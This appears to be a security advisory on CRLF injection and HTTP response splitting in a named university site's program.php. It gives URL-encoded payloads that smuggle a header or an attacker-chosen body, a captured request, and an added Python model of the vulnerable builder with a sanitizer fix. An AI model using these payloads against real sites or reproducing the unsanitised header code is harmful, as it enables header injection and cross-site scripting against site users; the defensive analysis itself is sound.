###################################################################
# Exploit Title : Bogazici University CRLF injection/HTTP response splitting
# Author [ Discovered By ] : Furkan Özer
# Date : 10/01/2020
# Vendor Homepage : ikincibahar.test.boun.edu.tr
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
###################################################################
What is CRLF?
When a browser sends a request to a web server, the server answers with a
response made of two parts: the HTTP response headers and the actual page
content, i.e. the response body. Individual header lines, and the header
block and the body, are separated by a specific pair of control characters,
a carriage return (CR, 0x0D) followed by a line feed (LF, 0x0A), known for
short as CRLF.
The client uses CRLF to tell where one HTTP header ends and the next begins,
and a blank line (CRLF CRLF) marks the end of the headers and the start of
the body. CRLF is part of the standard HTTP/1.1 message format, so it is
used by every web server, including Apache, Microsoft IIS and all others.
If user input is copied into a response header without CR and LF being
removed, an attacker can terminate the header line early and append headers
of their own (CRLF injection), or add a blank line and supply the response
body as well (HTTP response splitting).
###################################################################
# Injection Exploit :
**********************
/program.php?m=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_prototyqe
(%0d%0a is the URL-encoded CRLF that ends the header the application
writes the m parameter into; everything after it is sent as a new header line)
###################################################################
# Example Vulnerable Sites :
*************************
This vulnerability affects /program.php.
Attack details
URL encoded GET input m was set to
%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_prototyqe
Injected header found in the response:
SomeCustomInjectedHeader: injected_by_prototyqe
###################################################################
GET /program.php?m=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_prototyqe HTTP/1.1
Cookie: PHPSESSID=2tv1ktlil5duru2nsg2ahpu551
Host: ikincibahar.test.boun.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2
Accept: */*
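The request above only shows the injected header as a scanner reported it. The following is an added example, not code from the advisory or from the Boğaziçi site, that models the bug end to end: a response builder that copies the GET parameter m into a header (the header name X-Program-Mode is an assumption, standing in for whatever program.php really does with m), a client-side header parser that shows the injected header and an attacker-supplied body being accepted, and the check that stops it.

```python
"""Model of CRLF injection / HTTP response splitting and its fix.

Added example for the Boğaziçi advisory above; not the site's real code.
The header X-Program-Mode is hypothetical: it stands in for whichever
header program.php builds from the `m` parameter.
"""
from urllib.parse import parse_qs

CRLF = "\r\n"


def sanitize_header_value(value):
    """Reject CR or LF anywhere in a header value.

    Stripping is also acceptable, but rejecting makes the attempt visible
    in logs; this is the same rule PHP's header() applies since 5.1.2."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value: %r" % value)
    return value


def build_response(query_string, safe):
    """Build a raw HTTP/1.1 response that echoes GET parameter `m` into
    the X-Program-Mode header.  safe=False reproduces the bug (the value
    is copied verbatim); safe=True applies sanitize_header_value first."""
    # parse_qs percent-decodes, so %0d%0a in the URL becomes a real "\r\n"
    m = parse_qs(query_string).get("m", [""])[0]
    if safe:
        sanitize_header_value(m)
    body = "<html>ok</html>"
    lines = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        "X-Program-Mode: " + m,          # the injection point
        "Content-Length: %d" % len(body),
    ]
    return CRLF.join(lines) + CRLF + CRLF + body


def parse_response(raw):
    """Parse a raw response the way a lenient client does: the header block
    ends at the first empty line, each header line splits on the first ':'.
    Leading whitespace on a header name is stripped (the advisory's payload
    starts with %20; a strict RFC 7230 parser would treat that line as an
    obsolete line-folding continuation instead, which is why real payloads
    usually omit the space)."""
    head, _, body = raw.partition(CRLF + CRLF)
    status, *header_lines = head.split(CRLF)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return status, headers, body


# The advisory's payload: CRLF, then a new header line.
HEADER_PAYLOAD = "m=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_prototyqe"
# Response splitting: CRLF CRLF ends the headers, so the rest becomes the body.
BODY_PAYLOAD = "m=%0d%0a%0d%0a%3ch1%3epwned%3c/h1%3e"


def injected_header_accepted(query_string):
    """True if the vulnerable builder lets the attacker add a header."""
    _, headers, _ = parse_response(build_response(query_string, safe=False))
    return headers.get("SomeCustomInjectedHeader")


def attacker_controls_body(query_string):
    """True if the vulnerable builder lets the attacker start the body."""
    _, _, body = parse_response(build_response(query_string, safe=False))
    return body.startswith("<h1>pwned</h1>")


if __name__ == "__main__":
    print(build_response(HEADER_PAYLOAD, safe=False))
    print("injected header:", injected_header_accepted(HEADER_PAYLOAD))
    print("body controlled:", attacker_controls_body(BODY_PAYLOAD))
    try:
        build_response(HEADER_PAYLOAD, safe=True)
    except ValueError as e:
        print("blocked:", e)
```

The second payload is the part of the bug that matters for risk rating: once the attacker can end the header block, they choose the body the browser renders for the site's origin, so a CRLF bug is usually a stored-in-URL XSS as well as a header injection. When fixing, validate at the point where the value enters the header (or rely on a framework that refuses CR/LF, as PHP's header() does); encoding CRLF only in the URL parser is not enough, because the value may also arrive through cookies, JSON bodies or later decoding steps.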